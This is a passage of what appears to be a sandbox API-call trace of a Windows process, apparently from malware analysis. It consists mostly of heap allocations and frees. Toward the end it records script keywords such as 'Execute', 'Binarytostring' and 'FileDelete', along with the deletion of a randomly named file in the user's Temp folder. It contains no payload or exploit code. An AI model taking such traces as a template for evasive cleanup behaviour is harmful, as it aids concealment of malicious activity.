Flags=0x0, Size=0x4) returned 0x249bce0 [0133.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a848 | out: hHeap=0x25c0000) returned 1 [0133.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bce0 | out: hHeap=0x25c0000) returned 1 [0133.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a890 | out: hHeap=0x25c0000) returned 1 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x248a890 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bce0 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x248a848 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x248a860 [0133.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x248a878 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a830 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bcf0 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a878 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a818 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd00 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a800 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a7b8 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd10 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a7d0 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24893f0 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd20 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a7a0 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a788 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd30 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a770 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24894b0 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd40 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489450 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489408 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd50 | out: hHeap=0x25c0000) returned 1 [0133.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489528 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489d20 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd60 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489480 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489468 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd70 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489420 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24893a8 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd80 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2489d38 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a590 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bd90 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a578 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e3c0 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bda0 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248a560 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e318 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bdb0 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e2b8 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e288 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bdc0 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e2e8 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e348 | out: hHeap=0x25c0000) returned 1 [0133.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bdd0 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247eb10 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247e2d0 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bde0 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x247eaf8 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400078 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bdf0 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400060 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24000c0 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be00 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24000a8 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400108 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be10 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24000f0 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400138 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be20 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400120 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400168 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be30 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400150 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400198 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be40 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400180 | out: hHeap=0x25c0000) returned 1 [0133.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24001c8 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be50 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24001b0 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400210 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be60 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24001f8 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400240 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be70 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400228 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400270 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be80 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400258 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24002a0 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249be90 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400288 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24002d0 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bea0 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24002b8 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400318 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249beb0 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400300 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400360 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bec0 | out: hHeap=0x25c0000) returned 1 [0133.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400348 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400390 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bed0 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400378 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24003d8 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bee0 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24003c0 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400408 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bef0 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24003f0 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400450 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf00 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400438 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400498 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf10 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400480 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24004e0 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf20 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24004c8 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400528 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf30 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400510 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400570 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf40 | out: hHeap=0x25c0000) returned 1 [0133.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400558 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24005a0 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf50 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400588 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24005e8 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf60 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24005d0 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400630 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf70 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400618 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400660 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bf80 | out: hHeap=0x25c0000) returned 1 [0133.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400648 | out: hHeap=0x25c0000) returned 1 [0133.270] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.270] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.270] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0133.270] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0133.270] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0133.270] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0133.270] CharUpperBuffW (in: lpsz="FileDelete", cchLength=0xa | out: lpsz="FILEDELETE") returned 0xa [0133.270] CharUpperBuffW (in: lpsz="A2200004C22sz_", cchLength=0xe | out: lpsz="A2200004C22SZ_") returned 0xe [0133.270] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj", nBufferLength=0x104, lpBuffer=0x8be8f0, lpFilePart=0x8be8cc | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj", lpFilePart=0x8be8cc*="rngoajj") returned 0x2c [0133.272] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj", lpFindFileData=0x8beb00 | out: lpFindFileData=0x8beb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x56de7322, ftCreationTime.dwHighDateTime=0x1d49612, ftLastAccessTime.dwLowDateTime=0x58da830, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x463ebb80, ftLastWriteTime.dwHighDateTime=0x1d5071c, nFileSizeHigh=0x0, nFileSizeLow=0x2a7d, dwReserved0=0x34303242, dwReserved1=0x30383945, cFileName="rngoajj", cAlternateFileName="")) returned 0xa92b98 [0133.272] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\rngoajj")) returned 1 [0133.273] FindNextFileW (in: hFindFile=0xa92b98, lpFindFileData=0x8beb00 | out: lpFindFileData=0x8beb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x56de7322, ftCreationTime.dwHighDateTime=0x1d49612, ftLastAccessTime.dwLowDateTime=0x58da830, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x463ebb80, ftLastWriteTime.dwHighDateTime=0x1d5071c, nFileSizeHigh=0x0, nFileSizeLow=0x2a7d, dwReserved0=0x34303242, dwReserved1=0x30383945, cFileName="rngoajj", cAlternateFileName="")) returned 0 [0133.274] FindClose (in: hFindFile=0xa92b98 | out: hFindFile=0xa92b98) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499028 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499178 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499160 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24991a8 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499190 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24990b8 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c818 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499148 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24990a0 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499100 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499130 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc78 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499088 | out: hHeap=0x25c0000) returned 1 [0133.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498da0 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e00 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499040 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498950 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d88 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420870 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc40 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc50 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24205f8 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc50 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241fed8 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9b0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e60 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24988f0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ff8 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498de8 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d980 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24206d0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc60 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499010 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.276] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498920 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498890 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9a0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d610 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, 